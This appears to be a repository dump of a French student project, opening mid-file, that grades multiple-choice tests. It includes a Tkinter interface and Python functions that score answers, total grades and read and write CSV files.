\"+str(\"{:.2f}\".format(pourcentage3))+\"%\",font=('System', '16'))\r\n\r\n Canevas.grid(column=2, row=1 ,columnspan=4,padx=20, pady=0)\r\n Canevas2.grid(column=2, row=2,columnspan=4,padx=20, pady=0)\r\n Canevas3.grid(column=2, row=3,columnspan=4,padx=20, pady=0)\r\n return\r\n\r\ndef Detruire():\r\n \"\"\" Cette fonction efface les wigets de la fenetre pour eviter d'avoir un widget en trop lors d'un affichage \"\"\"\r\n #J'oublie la position des widgets pour les faire disparaitre de la fenetre grace à grid_forget()\r\n Entree.grid_forget()\r\n Bouton.grid_forget()\r\n Entree2.grid_forget()\r\n Bouton2.grid_forget()\r\n Canevas.grid_forget()\r\n BarreDefil.grid_forget()\r\n Canevas2.grid_forget()\r\n BarreDefil2.grid_forget()\r\n Bouton3.grid_forget()\r\n Canevas3.grid_forget()\r\n BarreDefil3.grid_forget()\r\n Label1.grid_forget()\r\n Label2.grid_forget()\r\n Label3.grid_forget()\r\n return\r\n\r\ndef modeNuit():\r\n \"\"\" Cette fonction permet de 
changer la fenetre pour la passer dans un mode nuit \"\"\" \r\n fen.config(bg='black')#Je configure tout pour que sa soit dans une couleur foncée\r\n\r\n Canevas.config(background='grey', relief='raised')\r\n Canevas2.config(background='grey',relief='raised')\r\n Canevas3.config(background='grey',relief='raised')\r\n\r\n Label1.config(bg='grey')\r\n Label2.config(bg='grey')\r\n Label3.config(bg='grey')\r\n\r\n Bouton.config(bg='grey', activebackground='grey')\r\n Bouton2.config(bg='grey', activebackground='grey')\r\n Bouton3.config(bg='grey', activebackground='grey')\r\n \r\n Entree.config(bg='grey')\r\n Entree2.config(bg='grey') \r\n #Je n'ai pas put changer les barres de défilement et le menu, en effet windows ne le permet que si on fait une classe et je n'ai pas voulu faire trop compliqué\r\n return\r\ndef modeJour():\r\n \"\"\" Cette fonction permet de changer la fenetre pour la passer dans un mode jour \"\"\" \r\n fen.config(bg='white')#Je configure tout pour que cela soit dans une couleur claire\r\n \r\n Canevas.config(background='#E4E4E4')\r\n Canevas2.config(background='#E4E4E4')\r\n Canevas3.config(background='#E4E4E4')\r\n\r\n Label1.config(bg='#E4E4E4')\r\n Label2.config(bg='#E4E4E4')\r\n Label3.config(bg='#E4E4E4')\r\n\r\n Bouton.config(bg='white', activebackground='white')\r\n Bouton2.config(bg='white', activebackground='white')\r\n Bouton3.config(bg='white', activebackground='white')\r\n \r\n Entree.config(bg='white', bd=5, relief='groove')\r\n Entree2.config(bg='white', bd=5, relief='groove')\r\n return\r\n \r\ndef mode(event):\r\n \"\"\" Cette fonction permet de changer entre mode nuit et mode jour \"\"\"\r\n global Mode#Je définis mode en global\r\n if Mode==True:#Si mode est sur jour alors j'execute modeNuit et je mets mode sur nuit \r\n modeNuit()\r\n Mode=False\r\n else:#Sinon l'inverse\r\n modeJour()\r\n Mode=True\r\n return\r\n\r\n \r\nfen=Tk()#Je définis ma fenetre Tkinter\r\n\r\nMode=True#Je définis le mode sur jour\r\n\r\nrecherche=StringVar()#Je définis les variables des entrées\r\n\r\nrecherche2=StringVar()\r\n\r\nLabel1=Label(fen)#Je définis les étiquettes\r\n\r\nLabel2=Label(fen)\r\n\r\nLabel3=Label(fen)\r\n\r\nCanevas=Canvas(fen)#Je définis les Canevas\r\n\r\nCanevas2=Canvas(fen)\r\n\r\nCanevas3=Canvas(fen)\r\n\r\nEntree=Entry(fen,textvar=recherche)#Je définis les entrées et les boutons\r\n\r\nBouton=Button(fen,text='Rechercher la note de cet.te élève', command=rechercher)\r\n\r\nEntree2=Entry(fen,textvar=recherche2)\r\n\r\nBouton2=Button(fen,text='Rechercher les élèves à partir de la note', command=rechercher2)\r\n\r\nBouton3=Button(fen,text='Rechercher le pourcentages d\\'élèves à partir de la note', command=VoirPourcentage)\r\n\r\nBarreDefil=Scrollbar(fen)#Je définis les barre de défilement\r\n\r\nBarreDefil2=Scrollbar(fen)\r\n\r\nBarreDefil3=Scrollbar(fen)\r\n\r\nMenuBarre=Menu(fen)#Je définis le menu principale\r\n\r\nfen.state('zoomed')#Je définis l'état plein écran de la fenetre au départ\r\n\r\nfen.configure(cursor='left_ptr', bd='5', menu=MenuBarre)#J'associe MenuBarre à la fenetre en temps que menu\r\n\r\nsousMenu=Menu(MenuBarre)#Je definis les sous menus\r\nsousMenu2=Menu(MenuBarre)\r\nsousMenu3=Menu(MenuBarre)\r\n\r\nMenuBarre.add_cascade(label=\"Accueil\", command=Accueil)#Je definis un choix Accueil associé à la commande du même nom\r\nMenuBarre.add_cascade(label=\"Notes des élèves\", menu=sousMenu)#Je définis des choix avec des sous menu en cascade\r\nMenuBarre.add_cascade(label=\"Réponses des élèves\", 
menu=sousMenu2)\r\nMenuBarre.add_cascade(label=\"Statistiques\", menu=sousMenu3)\r\nMenuBarre.add_cascade(label=\"Quitter\", command=fen.destroy)#Je définis un choix Quitter qui détruit la fenetre\r\n\r\nsousMenu.add_command(label='Voir les notes des élèves', command=VoirNotesEleves)#J'ajoute à chaque sous menu des choix avec des commandes associées avec les fonctions vues plus haut\r\nsousMenu.add_command(label='Voir l\\'élève ayant la meilleur note', command=EleveMeilleur)\r\nsousMenu.add_command(label='Voir l\\'élève ayant la pire note', command=ElevePire)\r\nsousMenu.add_command(label='Charger les notes des élèves dans un fichier', command=ecritureCSV)\r\n\r\nsousMenu2.add_command(label='Voir les réponses des élèves', command=VoirReponsesEleves)\r\nsousMenu2.add_command(label='Voir les réponses fausses des élèves', command=VoirReponsesFausses)\r\nsousMenu2.add_command(label='Voir les réponses du moins au plus réussi', command=VoirReponsesOrdreReusite)\r\nsousMenu2.add_command(label='Voir la solution des réponses', command=VoirSolution)\r\n\r\nsousMenu3.add_command(label='Voir les statistiques', command=VoirStatistiques)\r\nsousMenu3.add_command(label='Voir les différents pourcentages d\\'élèves', command=VoirPourcentages)\r\nsousMenu3.add_command(label='Voir le graphique en bâtons', command=VoirGraphiqueBaton)\r\n\r\nfen.title('Gestion QCM')#Je choisis le titre de ma fenetre\r\n\r\nAccueil()#Je définis que la page sur laquelle commencera l'utillisateur sera Accueil\r\nmodeJour()#Je définis que l'on commence en mode Jour\r\n\r\nfen.bind('<space>',mode)# J'associe la touche espace à mode\r\n\r\nfen.mainloop()#Je mets en boucle ma fenetre\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5793558359146118, "alphanum_fraction": 0.595265805721283, "avg_line_length": 33.503448486328125, "blob_id": "10832c420c2f0ee4e57977a9723c8758818ca3c2", "content_id": "d2c486a8356bba8aec3891a493941b89bbcf4e8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5179, "license_type": "no_license", "max_line_length": 117, "num_lines": 145, "path": "/Correcteur QCM - Copie/projetCorrecteur.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "lAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n if reponse==solution:\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':\r\n return 0\r\n else:\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre ma réponse\r\n resultat = []\r\n # ensuite j'y ajoute mon prenom\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste et je pense à \r\n reponse = lrep[i]\r\n solution = lsol[i]\r\n score = points(reponse,solution)\r\n resultat.append(score)\r\n return resultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n somme=0\r\n for i in range(1,len(lpoints)):\r\n somme+=lpoints[i]\r\n return somme\r\n\r\ndef reponseFausse(lpoints):\r\n rf=[]\r\n rf.append(lpoints[0])\r\n for i in range(1,len(lpoints)):\r\n if lpoints[i]!=3:\r\n rf.append(i)\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return rf # pour l'instant votre fonction ne fait rien. 
Ligne à supprimer quand vous écrivez votre fonction\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n ['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n grille2=[0]*len(grillerep)\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n for i in range(len(grillerep)):\r\n grille2[i]=corrige(grillerep[i],lsol)\r\n return grille2# pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n grille3=[0]*len(grillepoints)\r\n for x in range(len(grillepoints)):\r\n grille3[x]=[0]*2\r\n for i in range(len(grillepoints)):\r\n for j in range(len(grillepoints[i])):\r\n if j==0:\r\n grille3[i][0]=grillepoints[i][j]\r\n else:\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n grille4=[0]*len(grillepoints)\r\n for i in range(len(grillepoints)):\r\n grille4[i]=reponseFausse(grillepoints[i])\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return grille4 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef somGrille(grillepoints):\r\n listeSom=[]\r\n listeSom.append('somme')\r\n sommeGrille=0\r\n i=0\r\n j=1\r\n while j <len(grillepoints[i]):\r\n while i <len(grillepoints):\r\n sommeGrille+=grillepoints[i][j]\r\n i=i+1\r\n i=0\r\n listeSom.append(sommeGrille)\r\n sommeGrille=0\r\n j=j+1\r\n \r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return listeSom # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n mr=''\r\n mrc=0\r\n for i in range(len(grillerep)):\r\n if mrc<grillerep[i][1]:\r\n mrc=grillerep[i][1]\r\n mr=grillerep[i][0] \r\n return mr # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n sol=[]\r\n monFichierSol=open('solution.csv')\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")\r\n for ligne in contenu:\r\n sol.append(ligne)\r\n sol2 = [elt for lst in sol for elt in lst] \r\n \"\"\" decrire votre fonction ici \"\"\"\r\n monFichierSol.close()\r\n return sol2 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef lireCSV() :\r\n rep=[]\r\n monFichierRep=open('reponseQCM.csv')\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")\r\n for lignes in contenu:\r\n rep.append(lignes)\r\n monFichierRep.close()\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return rep # pour l'instant votre fonction ne fait rien. 
Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef ecritureCSV():\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n notePrenom=noteGrille(corriger)\r\n monFichierNote=open('noteQCM.csv',\"w\")\r\n for i in range(len(notePrenom)):\r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n \r\n" }, { "alpha_fraction": 0.6697247624397278, "alphanum_fraction": 0.6790021657943726, "avg_line_length": 64.90345001220703, "blob_id": "b3304d5b75963e82cd44f86d9aa72f7de7536a85", "content_id": "88619c1f71d5d2fbdb8d652993f3e49559c2dce7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9876, "license_type": "no_license", "max_line_length": 246, "num_lines": 145, "path": "/Correcteur QCM - Copie/projetCorrecteur_basique.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "lAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n \"\"\" Cette fonction permet d'atribuer les points aux élèves en fonction de leurs réponses \"\"\"\r\n if reponse==solution:#Je regarde si la solution est égale à la réponse de l'élève(réponse exacte), si oui je retourne 3\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':#sinon je demande si la reponse est égale à Z(absence de réponse), si oui je retourne 0\r\n return 0\r\n else:# sinon, si la réponse est fausse, je retourne -1\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" Cette fonction retourne une liste avec les points des élèves et leurs prénoms \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre mon résultat\r\n resultat = []\r\n # ensuite j'y ajoute le prénom de l'élève\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste\r\n reponse = lrep[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de reponses de l'élève à une variable reponse\r\n solution = lsol[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de solution à une variable solution\r\n score = points(reponse,solution)#J'attribue ce que retourne la fonction points à une variable score que j'insers ensuite à résultat\r\n resultat.append(score)\r\n return resultat# Je retourne résultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n \"\"\" Cette fonction renvoie la note totale à l'aide des points \"\"\"\r\n somme=0#J'initialise une variable somme à zéro qui sera ma note\r\n for i in range(1,len(lpoints)):# Je parcours ma liste en excluant le prénom\r\n somme+=lpoints[i]#J'additionne à somme les points à l'index i de ma liste de points\r\n return somme#Je retourne somme soit la note\r\n\r\ndef reponseFausse(lpoints):\r\n \"\"\" Cette fonction retourne la liste des index des réponses fausses \"\"\"\r\n rf=[]#J'initialise une liste vide nommée rf pour Réponses Fausses\r\n rf.append(lpoints[0])#J'y ajoute le prénom de l'élève\r\n for i in range(1,len(lpoints)):#Je parcours le reste de la liste de points\r\n if lpoints[i]!=3:#Si le point à l'index i n'est pas égale à 3, une bonne réponse, alors on ajoute l'index i à la liste rf\r\n rf.append(i)\r\n return rf # Je retourne la liste des réponses 
fausses\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n ['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n \"\"\" Cette fonction corrige une grille(au lieu d'une liste seule)et retourne une grille corrigée avec les points attribués pour chaque élève \"\"\"\r\n grille2=[0]*len(grillerep)#J'initialise une liste de la longueur de la grille de réponses\r\n for i in range(len(grillerep)):#Je parcours ma liste\r\n grille2[i]=corrige(grillerep[i],lsol)#J'assigne à l'index de la liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction corrige(à partir de l'index de la grille de réponses, soit la liste de réponse de l'élève,\r\n #et de la liste de solutions) qui retourne la liste des points marqués par question\r\n return grille2# Je retourne la deuxième grille\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" Cette fonction additionne une liste à l'intérieur d'une grille de points pour retourner une grille avec la note par élève \"\"\"\r\n grille3=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for x in range(len(grillepoints)):#Je parcours ma liste\r\n grille3[x]=[0]*2#J'insère une liste de deux occurences pour créer une grille\r\n for i in range(len(grillepoints)):#Je parcours ma grille\r\n for j in range(len(grillepoints[i])):\r\n if j==0:#Je mets le prénom en début de grille3[i] car grillepoints[i][0], grillepoints[i][j] dans cette situation, est l'emplacement du prénom de l'élève \r\n grille3[i][0]=grillepoints[i][j]\r\n else:#Je mets la note en deuxième position, note que je calcule avec la fonction note appliquée à la liste grillepoints[i]\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # Je retourne grille 3 soit la grille avec le prénom et la note des élèves\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n \"\"\" Cette fonction renvoie une grille avec les réponses fausses des élèves \"\"\"\r\n grille4=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for i in range(len(grillepoints)):#Je parcours ma liste\r\n grille4[i]=reponseFausse(grillepoints[i])#J'assigne à l'index de la deuxième liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction reponseFausse de l'index de la grille de points\r\n #qui retourne la liste des index de réponses fausses des élèves\r\n return grille4 # Je retourne grille4 soit la grille avec le prénom de l'élève et l'index de ses réponses fausses\r\n\r\ndef somGrille(grillepoints):\r\n \"\"\" Cette fonction additionne le total des points des élèves pour chacune des questions \"\"\"\r\n listeSom=[]#Je crée une liste vide qui contiendra le total des points des élèves\r\n listeSom.append('somme')#J'ajoute somme au début de la liste\r\n sommeGrille=0#J'initialise une variable à zéro\r\n for j in range(1,len(grillepoints[0])):#Je parcours la liste dans la grille, pour traiter la question j, en excluant le prénom et j'utilise la longueur de grillepoints[0] car les listes ont toutes la même longueur\r\n for i in range(len(grillepoints)):#Je parcours ensuite la grille pour lire les points de chaque élève pour cette question\r\n sommeGrille+=grillepoints[i][j]#J'additionne à la variable les points de la question\r\n listeSom.append(sommeGrille)#J'insere mon 
ajout(sommeGrille) dans la liste que j'avais initialisée au début\r\n sommeGrille=0#Je remets la variable à zéro pour traiter la question suivante \r\n return listeSom # Je retourne la liste\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n \"\"\" Cette fonction donne le nom de l'élève avec le meilleur résultat \"\"\"\r\n mr=grillerep[0][0]# J'initialise avec le nom du premier élève\r\n mrc=grillerep[0][1]#J'initialise à la note du premier élève\r\n for i in range(1,len(grillerep)):#Je parcours ma grille pour chaque élève excluant le premier\r\n if mrc<grillerep[i][1]:# Si la variable mrc(meilleur résultat chiffre) est inférieure à la note de cet.te élève alors :\r\n mrc=grillerep[i][1]#Je remplace la variable mrc avec la note\r\n mr=grillerep[i][0]# Et je remplace le nom de l'élève ayant eu le meilleur résultat \r\n return mr # A la fin je retourne le nom de l'élève ayant eu la meilleure note\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n \"\"\" Cette fonction lit le fichier solution et renvoie une liste avec la solution \"\"\"\r\n sol=[]#Je déclare une variable sol qui contiendra la solution des réponses\r\n monFichierSol=open('solution.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for ligne in contenu:#Je parcours le contenu\r\n sol=ligne#Je j'ajoute la l'ensemble des solutions dans sol\r\n monFichierSol.close()#Je ferme mon fichier\r\n return sol # Je retourne une liste avec la solution\r\n\r\ndef lireCSV() :\r\n \"\"\" Cette fonction lit les réponses puis renvoie une grille avec le prénom et les réponses qui se trouvaient dans le fichier \"\"\"\r\n rep=[]#Je déclare une variable rep qui contiendra les réponses des éléves\r\n monFichierRep=open('reponseQCM.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for lignes in contenu:#Je parcours le contenu\r\n rep.append(lignes)#Je j'ajoute toutes les lignes dans rep\r\n monFichierRep.close()#Je ferme mon fichier\r\n return rep # Je retourne le contenu du fichier\r\n\r\ndef ecritureCSV():\r\n \"\"\" Cette fonction écrit dans le fichier noteQCM le prénom et la note de l'élève et retourne la liste avec le prénom et la note de l'élève \"\"\"\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#J'attribue à la variable \"corriger\" la grille résultant de la fonction corrigeGrille, utilisée sur les données renvoyées par les fonctions lireCSV et lireSolutionCSV, soit une grille corigée\r\n notePrenom=noteGrille(corriger)#Je note ensuite cette grille avec la fonction noteGrille qui me renvoie une grille avec le prénom et la note de chaque élève\r\n monFichierNote=open('noteQCM.csv',\"w\")#J'ouvre en mode écriture mon fichier noteQCM\r\n for i in range(len(notePrenom)):#Je parcours ma liste et j'écris le prénom et la note, séparés d'un point virgule et ensuite j'écris un saut de ligne. \r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()#Je ferme mon fichier\r\n return notePrenom# Je retourne la liste des notes\r\n" } ]
3
amaslak0v/scripts
https://github.com/amaslak0v/scripts
1db51825b33d508d3b6204490763a19248eef932
a51c9e47aea576a05ad518f5a25f0c83dcc84aba
48baf40dd12a3b144db29fd20a38889b6d48495e
refs/heads/master
2020-04-23T22:05:35.098363
2019-10-10T14:10:47
2019-10-10T14:10:47
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5541666746139526, "alphanum_fraction": 0.5609375238418579, "avg_line_length": 29, "blob_id": "4fe2c8d8e127b078d1289823e9c7a2d096e76ec1", "content_id": "2bcaf403431992465e1f0f38fd2a41de7d94924d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1920, "license_type": "no_license", "max_line_length": 104, "num_lines": 64, "path": "/change-photos-timestamp/timestamp-changer.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport datetime\nimport sys\n\n\"\"\"\nChanges timestamp for all photos in directory.\nSorts photos by name and add's 1min interval for each.\n\"\"\"\n\nclass Timestamp():\n\n def __init__(self, day, month, year):\n self.year = year\n self.month = month\n self.day = day\n self.hour = datetime.datetime.now().hour\n self.minute = datetime.datetime.now().minute\n self.second = datetime.datetime.now().second\n\n def __repr__(self):\n return '{}-{}-{} {}:{}:{}'.format(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second)\n\n\nclass TimestampChanger():\n\n def get_sorted_photos_list(self, entries):\n photos = {}\n for entry in entries:\n if '.JPG' in entry.name:\n photos[int(entry.name.strip('.JPG'))] = entry\n else:\n pass\n return dict(sorted(photos.items())).values()\n\n def change_timestamp(self, dir_name, date):\n with os.scandir(dir_name) as entries:\n for entry in self.get_sorted_photos_list(entries):\n # Add 1 min to photo\n date = date + datetime.timedelta(seconds=60)\n self.modify_photo(entry, date)\n\n def modify_photo(self, entry, timestamp):\n modTime = time.mktime(timestamp.timetuple())\n os.utime(entry, (modTime, modTime))\n\ndef main(dir_name, date):\n # Example: modify_date.py photos/ 17-4-2018\n #todo Add %H:%M:%S\n timestamp = Timestamp(*date.split('-'))\n changer = TimestampChanger()\n print(\"=> Changing timestamp in {}\".format(dir_name))\n print(\"=> Timestamp: {}\".format(date))\n\n changer.change_timestamp(dir_name, datetime.datetime.strptime(repr(timestamp), '%Y-%m-%d %H:%M:%S'))\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n" }, { "alpha_fraction": 0.6707021594047546, "alphanum_fraction": 0.6888619661331177, "avg_line_length": 32.08000183105469, "blob_id": "101c902302190676ecde7487275f489b75bdec93", "content_id": "e06ae77ff8eed60086d8eb0cc18b5a2a1ea8de07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 958, "license_type": "no_license", "max_line_length": 128, "num_lines": 25, "path": "/tcp_server/tcp_server/echo_client.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import socket\n\n\"\"\"\nВторое приложение (клиент)\nОрганизовать отсылку команд серверу (сообщений и управляющих команд). 
Команды с параметрами вводятся пользователем с клавиатуры.\n\"\"\"\n\nHOST = '0.0.0.0' # The server's hostname or IP address\nPORT = 8080 # The port used by the server\n\nprint(\"input 'get_users' to get list of all users\")\ncommand = str(input('Input command:'))\ndata = \"{'send_to': 'user_1', 'command': '\"+command+\"'}\"\n\n# Create a socket (SOCK_STREAM means a TCP socket)\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n # Connect to server and send data\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data, \"utf-8\"))\n\n # Receive data from the server and shut down\n received = str(sock.recv(1024), \"utf-8\")\n\nprint(\"Sent: {}\".format(data))\nprint(\"Received: {}\".format(received))" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 22.214284896850586, "blob_id": "74a899212168e0f9aee1d0b15745db04d1d1c72d", "content_id": "b0a5e23005b0077364b624692376083e6a1bdfa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 325, "license_type": "no_license", "max_line_length": 81, "num_lines": 14, "path": "/bash/myenv/Vm-env/configs/.bashrc", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#aliases\nalias trc='tree -C'\nalias trp='tree -Cpu'\nalias trd='tree -C -d'\nalias clc='clear'\nalias vi='vim'\nalias ll='ls -l'\n\n# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.\nexport PATH=\"$PATH:$HOME/.rvm/bin\"\n\nexport PS1=\"\\$[\\[\\e[32m\\]\\h\\[\\e[m\\]]:[\\[\\e[31m\\]\\u\\[\\e[m\\]]:[\\W]: \"\n" }, { "alpha_fraction": 0.654618501663208, "alphanum_fraction": 0.6586345434188843, "avg_line_length": 16.785715103149414, "blob_id": "6d37d2bb2165992629c449ce9025b03fdbf4ae0b", "content_id": "883b5bf73e2339f83eb3259b0b425c62f387f9c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 249, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/bash/myenv/Vm-env/start.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"Starting prep-env script!\"\n\necho \"==> Configuring Vim\"\n. user-env/vim.sh\n\necho \"==> Starting bashrc config module\"\n. user-env/bash.sh\n\n#echo \"==> Generating ssh keys\"\n#{$1}/Vm-env/user-env/keys.sh\n\nsource ~/.bashrc\necho \"===> END\"\n" }, { "alpha_fraction": 0.591549277305603, "alphanum_fraction": 0.6003521084785461, "avg_line_length": 19.962963104248047, "blob_id": "b8d68915258298397aa5e718cb905e5aadef461f", "content_id": "eb608101a82670dde844e8112adaf75a6309b56b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 568, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/bash/recovery.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash \n\necho \"=> Searching for disk to recover\"\ndiskutil list\ndf -h\n\nread -p \"-> Select disk to recover: \" disk\necho \"Recovering disk: ${disk}\"\n\necho \"=> Unmounting ${disk}\"\ndiskutil unmountDisk ${disk}\n\necho \"=> Running diagnostics on ${disk}\"\nfdisk ${disk}\ndiskutil info ${disk}\n\nread -r -p \"-> Recover ${disk}? It will be formated. 
[y/N] \" response\n\ncase \"$response\" in\n [yY][eE][sS]|[yY]) \n\t\t\t\techo \"=> Recovering ${disk}\"\n diskutil partitiondisk ${disk} 1 MBRFormat \"HFS+\" \"flash\" 1024M\n ;;\n *)\n\t\t\t\techo \"=> Exiting\"\n ;;\nesac\n\n\n" }, { "alpha_fraction": 0.737922728061676, "alphanum_fraction": 0.7439613342285156, "avg_line_length": 47.764705657958984, "blob_id": "1cd795f1abab225b203d014c3c5d8f6b1f5b32b0", "content_id": "07b377a75315fad60a4bee85e4861529d1a28405", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 828, "license_type": "no_license", "max_line_length": 128, "num_lines": 17, "path": "/google_sheets_parcer/README.md", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "****\n#### Script resources_parser.py executes following steps:\n\n\n1. Downloads git@github.com:amaslakou/saas-app-deployment.git.\n2. Parse files from to_check_folders value (list of folders), and gets metrics from all selected folders, and imports it to CSV.\n3. Updates Google Sheet with metrics for all environments.\n\n#### Requirements:\n- python 3.7\n- imported libs\n- access to git@github.com:*maslakou/saas******.git (~/.ssh keys configured)\n- client_secrets_service_account.json file.\n - Register in Google Cloud Platform and create project.\n - Create service account in GCP.(Place it in same folder as script, and rename as client_secrets_service_account.json)\n - Add API's in API's & Services tab in GCP - Google sheets API, Google Drive API\n - Create Google Spreadsheet, and add write access to created service account." }, { "alpha_fraction": 0.6338329911231995, "alphanum_fraction": 0.6423982977867126, "avg_line_length": 34.846153259277344, "blob_id": "175b9d0135b5eb7362dbcd0e3406c38be559ae2f", "content_id": "9e89aa29ca973851e5ff4ed3d525164e017d25b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 467, "license_type": "no_license", 